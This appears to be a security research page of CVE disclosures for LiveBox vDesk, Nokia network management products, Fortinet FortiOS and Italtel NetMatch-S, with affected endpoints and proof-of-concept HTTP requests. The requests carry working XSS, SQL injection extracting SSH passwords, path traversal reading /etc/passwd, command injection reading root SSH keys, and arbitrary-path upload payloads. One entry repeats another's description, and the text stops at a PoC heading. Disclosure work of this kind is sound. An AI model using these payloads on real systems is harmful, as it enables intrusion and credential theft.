Vulnerability Description: Multiple Improper Access Control- CWE-284

Software Version: < v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45172

CVSv39.8

Severity: Critical

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the  system.

Step-by-step instructions and PoC

A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles. 

Affected Endpoints

·       https://vdeskbridge.[REDACTED]/api/v1/registration/validateEmail?

·       https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/user/adduser

·       https://vdeskbridge.[REDACTED]/api/v1/registration/changePasswordUser


Payload used by an attacker to create arbitrary guest users without authentication: 

Figure 1 HTTP Request and Response pair in which the creation of new users without authentication

 

Click to Enlarge

Figure 2  Pair of HTTP requests and responses showing the theft of a victim user's account without authentication.

 

Click to Enlarge

Security Impact

A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles. 

CVE-2022-45171– Livebox Collaboration vDESK

Vulnerability Description: Unrestricted Upload of File with Dangerous Type  - CWE-434

            Software Version: ≤ v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45171

CVSS: 8.8

Severity: High

Credits: Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, Mario Cola, Massimiliano Brolli

The Collaboration vDesk (vSHARE) web page it has been found no protection against arbitrary and potentially dangerous file uploading.

 

Step-by-step instructions and PoC

 

A remote user, authenticated to the Collaboration vDesk Web Page, through vSHARE web site section, can arbitrary upload potentially dangerous files without restrictions.

In next picture it is possible to see that file has been successfully uploaded. 

For further information about EICAR: https://www.eicar.org/?page_id=3950

 

Security Impact

 

This vulnerability would allow an attacker to exploit the platform by injecting malware and, under certain conditions, to execute code in the remote machine.

CVE-2022-45170 – LiveBox Collaboration vDesk

Vulnerability Description: Cryptographic Issue (File Encryption API) - CWE-310

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45170

CVSv3: 6.5

Severity: Medium

Credits: Luca Borzacchiello, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to  the administrator role, and steal the accounts of any users on the  system.

Step-by-step instructions and PoC

The application allows a malicious user to decipher a file without knowing the key set by
the user.

The vulnerability can be exploited in the following way:

1.     the attacker logs in the victim account (we assume that the attacker knows the credentials of the victim, or has access to the victim logged account);

2.     the attacker list the ID of the files in the vShare of the victim performing a GET
request to https://vdeskbridge.[HOSTNAME]/api/v1/files?path= ;

3.     the attacker performs a POST request to https://vdeskbridge.[HOSTNAME]
/api/v1/vencrypt/decrypt/file specifying the ID of the cyphered file that
he wants to decipher (obtained at 2).

Notice that the same attack is successful if the attacker downloads the cyphered file, upload
it to its own VDESK account, and performs the same POST request at line 3.

Affected Endpoints

·       https://vdeskbridge.[HOSTNAME]/api/v1/vencrypt/
decrypt/file

Below are the evidences with the vulnerability details and the payloads used.

Paylod used to exploit the vulnerability:

Figure 6 Notice how in the request we are not specifying any password or derived secret.

 

Click to Enlarge

 

Security Impact

A malicious user can decrypt the file of the victim without knowing the cyphering key. 

CVE-2022-45169 – LiveBox Collaboration vDesk

Vulnerability Description: Redirection to Untrusted Site ('Open Redirect') – CWE-601

Software Version: ≤v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45169

CVSv3: 5.4

Severity: Medium

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

The web application allows an authenticated user to send an arbitrary push notification (including clickable links) to another arbitrary user of the application.

 

Step-by-step instructions and PoC

An authenticated user can send an arbitrary push notification to any other user of the system. The push notification can include an (invisible) clickable link.

The vulnerability can be exploited sending a POST request (including the authentication cookie) to the following vulnerable endpoint:

 

·       https://vdeskbridge.[HOSTNAME]/api/v1/notification/createnotification

 

Payload used to exploit the vulnerability:

Figure 1 – Details of payload

Click To Enlarge

Figure 2 – Details of request and response

Click To Enlarge

Security Impact

Malicious users send arbitrary push notifications to other users, starting phishing attacks or exploiting other XSS vulnerabilities.

CVE-2022-45168 – Livebox Collaboration vDesk

Vulnerability Description: Improper Authentication - CWE-287

Software Version: <= v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45168

CVSSv3: 6.5

Severity: Medium

Credits: Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, Massimiliano Brolli

The web application allows an authenticated user to generate the backup codes before having checked the TOTP. This allows an attacker to completely bypass the check.

 

Step-by-step instructions and PoC

The application allows a user to set a “Backup Code” to be used during the two-factor authentication (instead of using the TOTP).

Unfortunately, the application allows a user to generate or regenerate the backup codes before checking the TOTP.

 The vulnerability can be exploited in the following way:

1.         logging into the vDesk web application as SAML user;

2.         selecting the “backup code” option;

3.         perform a createbackupcodes request using the session cookie obtained at 2;

4.         use one of the generated backup codes to bypass the two-factor authentication.

Affected Endpoints

•           URL: https://vdesk.[DOMAIN]/login/backup_code

•           URL: https://vdeskbridge.[DOMAIN]/api/v1/vdeskintegration/createbackupcodes

 

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Figure 1 - payload

Click To Enlarge

Figure 2 - Detail of the request for generating the backup codes. 

Click To Enlarge

Security Impact

Malicious users can bypass the two-factor authentication.

CVE-2022-43675 – NOKIA NFM-T Network Element Manager

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-43675

CVSv3: 6.1

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Multiple Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects the user input without sanitization.

 

Step-by-step instructions and PoC

 

Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflect the user input without sanitization. This type of vulnerability has been found on numerous web application endpoints, we'll mention just a few for demonstration purposes.

 

Affected Endpoints

·       URL: https://<host>/oms1350/pages/otn/cpbLogDisplay?filename=

o   HTTP GET Parameter: filename

·       URL: https://<host>/oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay?id=174&connectionName=

o   HTTP GET Parameter: id

·       URL: https://<host>/oms1350/pages/otn/mainOtn?menuItem=items&fromReactUI=FALSE&component=npr&resource=nes&id=101&callback=callback

o   HTTP GET Parameter: all parameters

 

Payload used to exploit the vulnerability, it's necessary encode all payloads (URL encoding) in order to exploit the vulnerability:

 

GET /oms1350/pages/otn/cpbLogDisplay?filename=%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

 

Cookie: JSESSIONID=; NSPOS_JSESSIONID=

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

 

Security Impact

 

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

CVE-2022-41763 – Nokia AMS

Vulnerability Description: Improper Neutralization of Directives in Dynamically Evaluated Code – CWE-95

Software Version: v9.7.05

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41763

CVSv3: 8.8

Severity: High

Credits: Claudio Jacomelli, Sebastiano Lanzarotto, Massimiliano Brolli

An issue was discovered in NOKIA AMS 9.7.05. Remote Code Execution exists via the debugger of the ipAddress variable. A remote user, authenticated to the AMS server, could inject code in the PING function. The privileges of the command executed depend on the user that runs the service.

Step-by-step instructions and PoC

A remote user, authenticated to the AMS server, could inject code in the PING function

 

Affected Endpoints

·       Server: AMS

·       Function: PING Test

 

Below are the evidences with the vulnerability details and the payloads used.

The step to achieve the vulnerability consist in a simple modification via debugger of the ipAddress variable. This is needed because the frontend application manage to sanitize the content.

Security Impact

The vulnerability lead to execute code on the server machine in which the user is logged in. The privilege of the command executed depends on the user that run the service.

CVE-2022-41762 – NOKIA NFM-T Network Element Manager

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41762

CVSv3: 6.1

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Multiple Cross-site scripting Reflected (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/GET parameter which reflects the user input without sanitization.

 

Step-by-step instructions and PoC

 

The Web application, and to be more precise the module that manages the VM element (qemu Webui), does not properly check the parameters sent as input from clients before is re-included within the HTTP response returned by the application. Due to the lack of validation of user input, allows an attacker to modify the HTML code and the expected execution flow could be altered.

 

Affected Endpoints

·       URL: https:// [...]/cgi-bin/R19.9/log.pl?logfile=&bench=1734&c=test&pid=19247&cmd=test

o   HTTP GET Parameter: all parameters

·       URL: https:// [...]/cgi-bin/R19.9/top.pl?logfile=/var/file&bench=[REDACTED]&c=1&pid=15883&cmd=test

o   HTTP GET Parameter: bench, pid

·       URL: https:// [...]/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1&host=1

o   HTTP GET Parameter: id

 

Below are the evidences with the vulnerability details and the payloads used.

 

Payload used to exploit the vulnerability:

 

GET /cgi-bin/R19.9/log.pl?logfile="</script><img+src=1+onerror=alert(1)>&bench=123&c=test&pid=19247&cmd=test HTTP/1.1

Host: X.X.X.X

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

 

This first step consists of replacing the value in the “logfile” GET parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed in several places on the page without any checks being made. The same behavior is the same for all parameters of the request.

Click to Enlarge

Security Impact

 

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

CVE-2022-41761 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Absolute Path Traversal – CWE-36

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41761

CVSv3: 6.5

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote authenticated attacker to read files on the filesystem arbitrarily.

 

Step-by-step instructions and PoC

After authenticating the web application, the endpoint "/cgi-bin/R19.9/viewlog.pl " was identified using a direct object reference in the HTTP request, i.e., using the explicit name of the resource to access. By inserting an arbitrary filename in the “logfile” parameter, it is possible to read arbitrary files present on the filesystem.

 

Affected Endpoints:

·       URL: https://[...]/cgi-bin/R19.9/viewlog.pl

 

Parameter:

·       HTTP GET: logfile

 

Below are the evidences with the vulnerability details and the payloads used.

 

GET /cgi-bin/R19.9/viewlog.pl?action=getfile&logfile=/etc/passwd HTTP/1.1

Host: [...]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Authorization: Basic [...]

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

Te: trailers

Connection: close

 

Detail of the HTTP request/response showing the exploitation of the vulnerability and the illicit reading of the "/etc/passwd" file:

Security Impact

 

Exploiting this vulnerability on the web portal it was possible to read the files on the filesystem.

CVE-2022-41760 – NOKIA NFM-T Network Element Manager

Vulnerability Description: Relative Path Traversal – CWE-23

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41760

CVSv3: 6.5

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote authenticated attacker to read files on the filesystem arbitrarily.

 

Step-by-step instructions and PoC

 

By manipulating the GET "filename" parameter referring to files with sequences such as "dot-dot-slash (../)" it is possible to access arbitrary files and directories stored on the filesystem, including application source code, configuration files and critical system files.

 

Affected Endpoints:

·       URL: https://[...]:8443/oms1350/data/cpb/log?filename=

 

Parameter:

·       filename

 

Below is the evidence.

Detail of the HTTP request/response showing exploitation of the vulnerability.

Security Impact

 

Exploiting this vulnerability on the web portal it was possible to read the files on the filesystem.

CVE-2022-40715 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Absolute Path Traversal - CWE-36

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40715

CVSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. An Absolute Path Traversal vulnerability exists for a specific endpoint via the logfile parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.

CVE-2022-40714 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40714

CVSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /oms1350/* endpoints.

CVE-2022-40713 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Multiple Relative Path Traversal - CWE-23

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40713

CVSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. Multiple Relative Path Traversal issues exist in different specific endpoints via the file parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.

CVE-2022-40712 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79

Software Version: R14.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40712

CVSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /cgi-bin/R14.2* endpoints.

CVE-2022-40680 – Fortinet FortiOS

Vulnerability Description: Stored Cross-Site Scripting - CWE-79

Software Version: FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40680

CVSv3: 5.4

Severity: Medium

Credits: Massimiliano Ferraresi, Massimiliano Brolli

A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages.

Step-by-step instructions and PoC

Vulnerability can be reproduce through the following actions.

An attacker with system permission can inject arbitrary javascript code in the Replacement Messages pages.

Figure 3 Replacement Messages function

 

Click to Enlarge

An attacker have to open and modify a page like “FortiGuard Block Page”:

Figure 4 Source of “FortiguardBlockPage”

 

Click to Enlarge

In the HTML source I tried to inject arbitrary javascript code, but with simple payload <script>alert(1);</script> the application did not execute anything:

Figure 5 Simple Payload injected

 

Click to Enlarge

Probably the application satinizes the <script></script> content and does not execute the javascript code inside these tags, however with a custom payload like <image/src/onerror=prompt("XSS")> is possible to execute arbitrary javascript code:

·       <image/src/onerror=prompt("XSS")>

Figure 6 XSS

 

Click to Enlarge

Click on “ok” and save the setting, the malicious code now is stored in the FortiGuardBlockPage,  if the user visit this page the arbitrary javascript code will execute:

Figure 7 Malicious javascript stored in the body

 

Click to Enlarge

Security Impact

A potential attacker could modify the vulnerable web page with malicious javascript code permanently, thereby attacking anyone who visits the page.

CVE-2022-39822 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822

CVSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web Application is affected by SQL Injection vulnerability. Through the injection of arbitrary SQL statements, a potential attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.

 

Step-by-step instructions and PoC

A remote user, authenticated to the web application may manipulate the request parameters to exploit error output from the database to manipulate its data. It manipulates the database into generating an error that informs the actor of the database’s structure and afterwards extracts the data contents in the database statement. Please see the examples below for step-by-step instructions to reproduce the vulnerability.

Affected Endpoints

 

·       URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1host=1

·       HTTP Parameter: id, host

 

Below are the evidences with the vulnerability details and the payloads used.

 

GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1

Host: <host>

Cookie: XSRF=[REDACTED]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Authorization: Basic [REDACTED]

Connection: close

 

This first step consists of changing the value parameter to obtain a SQL error:

Then the attacker can manipulate the parameter passed to the function, to discover the names of users, data from other tables, or to eventually guess the database hostname. More in detail, it was possible to extract the ssh password of the root user.

 

Security Impact

 

Malicious users can access data processed by the database, and potentially conduct further attacks against the database, other portal’s users and the server machine itself.

CVE-2022-39821 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Insertion of Sensitive Information into Log File - CWE-532

Software Version: R14.2

NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-39821

CVSv3: 7.5

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, an Insertion of Sensitive Information into an Application Log File vulnerability occurs. The web application stores critical information, such as cleartext user credentials, in world-readable files in the filesystem.

CVE-2022-39820 – NOKIA NFM-T Network Element Manager

Vulnerability Description: Unprotected Storage of Credentials – CWE-256

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39820

CVSv3: 6.5

Severity: Medium

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

Access credentials for the web application are stored in clear text on the filesystem

 

Step-by-step instructions and PoC

A remote user, authenticated to the operating system, with access privileges to the directory “/root” and “/DEPOT”, is able to read credentials to access the web portal NFM-T and control all the PPS Network elements.

 

Affected files:

·       PATH: “/root/RestUploadManager.xml.DRC”

·       PATH: “/DEPOT/KECustom_199/OTNE_DRC/RestUploadManager.xml”

 

Below is the evidence with the vulnerability details.

Security Impact

 

An unauthorized user can access the web application with the highest privileges.

CVE-2022-39819 – Nokia 1350 OMS Optical Management System

Vulnerability Description: OS Command Injection - CWE-78

Software Version: R14.2

NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-39819

CVSv3: 8.8

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities  occurs. This allows authenticated users to execute commands on the operating system.

CVE-2022-39818 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') – CWE-78

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39818

CVSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows any authenticated user to execute commands on the Operating System.

 

Step-by-step instructions and PoC

The Web application, and to be more precise the module that manages the VM element (qemu Webui), does not properly check the parameters sent as input before they are processed on the server. Due to the lack of validation of user input, that allows an attacker to replace and inject arbitrary system commands with the root privileges of the application user.

Affected Endpoints

·       URL: https://[...]/cgi-bin/R19.9/log.pl

Parameter:

·       HTTP GET: cmd

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&c=22SHOWCA&runfrom=/var/autoinstall/R19.9&cmd=cat%20/root/.ssh/* HTTP/1.1

Host: [...]

Cookie: XSRF=618627

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept-Encoding: gzip, deflate

Authorization: Basic [...]

Referer: https://[...]/cgi-bin/R19.9/actions.pl?session=KALEVO19

Connection: close

 

This first step consists of replacing the command in the “cmd” GET parameter whit the chosen one to execute the command:

Then, if needed, the output of the command can be read in the specified log file in the previous request “/tmp/.AIClogger-KALEVO19-log12065.log”:

Security Impact

By exploiting the lack of validation mechanisms in the Web app, it was possible to obtain, through the execution of arbitrary commands, a shell for remote control of the endpoint with the root privileges.

CVE-2022-39817 – Nokia 1350 OMS Optical Management System

Vulnerability Description: SQL Injection - CWE-89

Software Version: R14.2

NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-39817

CVSv3: 8.8

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, multiple SQL Injection vulnerabilities occurs. Exploitation requires an authenticated attacker. Through the injection of arbitrary SQL statements, a potential authenticated attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.

CVE-2022-39816 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Insufficiently Protected Credentials - CWE-522

Software Version: R14.2

NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-39816

CVSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, Insufficiently Protected Credentials (cleartext administrator password) occur in the edit configuration page. Exploitation requires an authenticated attacker.

CVE-2022-39815 – Nokia 1350 OMS Optical Management System

Vulnerability Description: OS Command Injection - CWE-78

Software Version: R14.2

NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-39815

CVSv3: 9.8

Severity: Critical

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities occurs. This vulnerability allow unauthenticated users to execute commands on the operating system.

CVE-2022-39814 – Nokia 1350 OMS Optical Management System

Vulnerability Description: Open Redirect - CWE-601

Software Version: R14.2

NISThttps://nvd.nist.gov/vuln/detail/CVE-2022-39814

CVSv3: 6.1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

In NOKIA 1350 OMS R14.2, an Open Redirect vulnerability occurs is the login page via next HTTP GET parameter.

CVE-2022-39813 – Italtel NetMatch-S CI

Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored- CWE-79

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813

CVSv36,1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.

Step-by-step instructions and PoC.

 

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by both the stored and reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed both pre and post authentication.

Affected Endpoints

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec

o   HTTP POST Parameter: j_username

·        URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp

o   HTTP POST Parameter: name, actLine  

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27

The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.

Vulnerability Research Image

Figure 1

 

Click to enlarge

Vulnerability Research Image

Figure 2

 

Click to enlarge

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST] Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q= 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

name=today.csv&actLine=”</script><img src=x onerror=”alert(1)”>

The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value in the “actLine” POST parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed without any checks being made. The same behavior is present also for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.

Vulnerability Research Image

Figure 3

 

Click to enlarge

Vulnerability Research Image

Figure 4

 

Click to enlarge

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

CVE-2022-39812 – Italtel NetMatch-S CI

Vulnerability Description: Absolute Path Traversal- CWE-36

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39812

CVSv37,5

Severity: High

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 allows Absolute Path Traversal under NMSCI-WebGui/SaveFileUploader. An unauthenticated user can upload files to an arbitrary path. An attacker can change the uploadDir parameter in a POST request (not possible using the GUI) to an arbitrary directory. Because the application does not check in which directory a file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.

Step-by-step instructions and PoC

An unauthenticated user can upload files in an arbitrary path using a specific functionality of the web application. An attacker can change the “uploadDir” parameter in the POST request (not possible using the GUI) to an arbitrary directory. Since the application does not check in which directory the file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.

Below are the evidences with the vulnerability details and the payloads used. In this case, uploadDir was changed from /var/tmp/external/ to /home/oam/

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/SaveFileUploader HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------------------------- 102436911942005582423300325296
Content-Length: 484
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/system.jsp
Te: trailers
Connection: close
 -----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="file"; filename="TEST.sh"
Content-Type: application/x-shellscript

TEST
 -----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="fileName"

TEST.sh
 -----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="uploadDir"

/home/oam/
 -----------------------------102436911942005582423300325296—

Vulnerability Research Image

Figure 1

 

Click to enlarge

Vulnerability Research Image

Figure 2

 

Click to enlarge

Security Impact

By exploiting this vulnerability on the web portal it was possible to upload files in an arbitrary path on the filesystem.

CVE-2022-39811 – Italtel NetMatch-S CI

Vulnerability Description: Multiple Improper Access Control- CWE-284

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39811

CVSv39,1

Severity: Critical

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 has incorrect Access Control under NMSCI-WebGui/advancedsettings.jsp and NMSCIWebGui/SaveFileUploader. By not verifying permissions for access to resources, it allows an attacker to view pages that are not allowed, and modify the system configuration, bypassing all controls (without checking for user identity).

Step-by-step instructions and PoC

